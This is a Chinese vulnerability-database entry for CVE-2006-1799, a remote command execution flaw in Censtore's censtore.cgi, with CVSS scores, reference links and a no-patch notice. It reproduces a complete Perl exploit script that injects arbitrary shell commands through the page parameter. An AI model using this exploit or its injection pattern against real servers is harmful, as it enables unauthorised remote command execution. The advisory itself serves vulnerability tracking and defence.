CVE-2006-1799
CVSS7.5
发布时间 :2006-04-18 06:02:00
修订时间 :2011-03-07 21:34:08
NMCOE    

[原文]censtore.cgi in Censtore 7.3.002 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the page parameter.


[CNNVD]Censtore censtore.cgi 远程任意命令执行漏洞 (CNNVD-200604-276)

        Censtore 7.3.002及早期版本中的censtore.cgi允许远程攻击者借助于页面参数中的shell元字符执行任意命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1799
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1799
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200604-276
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/1352
(UNKNOWN)  VUPEN  ADV-2006-1352
http://www.securityfocus.com/bid/17515
(UNKNOWN)  BID  17515
http://secunia.com/advisories/19666
(VENDOR_ADVISORY)  SECUNIA  19666
http://xforce.iss.net/xforce/xfdb/25905
(UNKNOWN)  XF  censtore-page-command-execution(25905)
http://milw0rm.com/exploits/1669
(UNKNOWN)  MILW0RM  1669

- 漏洞信息

Censtore censtore.cgi 远程任意命令执行漏洞
高危 输入验证
2006-04-18 00:00:00 2006-04-18 00:00:00
远程  
        Censtore 7.3.002及早期版本中的censtore.cgi允许远程攻击者借助于页面参数中的shell元字符执行任意命令。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://censtore.com/
        

- 漏洞信息 (1669)

Censtore <= 7.3.x (censtore.cgi) Remote Command Execution Exploit (EDBID:1669)
cgi webapps
2006-04-13 Verified
0 FOX_MULDER
N/A [点击下载]
#!/usr/bin/perl
#
#  Censtore.cgi exploit by FOX_MULDER (fox_mulder@abv.bg)
#
#  Vulnerability foud by FOX_MULDER.
#
#  This is the first exploit i release and the bug is not public so enjoy.
#  Ask http://censtore.com/ what they think about it !!!  
#
###########################

use IO::Socket;
use LWP::Simple; 

sub Usage {
print STDERR "\nFOX_MULDER DID IT AGAIN !!!\n";
print STDERR "Usage:\ncenex.pl <www.example.com> </path/> \"cmd\"\n";
exit;
}

if (@ARGV < 3)
{
 Usage();
}


$host = @ARGV[0];
$path = @ARGV[1];
$command = @ARGV[2];
print "\n\n !!! ULTRA PRIVATE EDITION !!! \n\n";
print "censtore.cgi Remote Command Execution Exploit by FOX_MULDER\n";

print "\n[+] Conecting to $host\n";

my $result = get("http://$host$path/censtore.cgi?page=|$command|"); 

if (defined $result) { 
print $result; 
} 
else { 
print "Error with request.\n"; 
}

# milw0rm.com [2006-04-13]
		

- 漏洞信息

24638
Censtore censtore.cgi page Arbitrary Command Execution
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-04-13 Unknow
2006-04-13 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站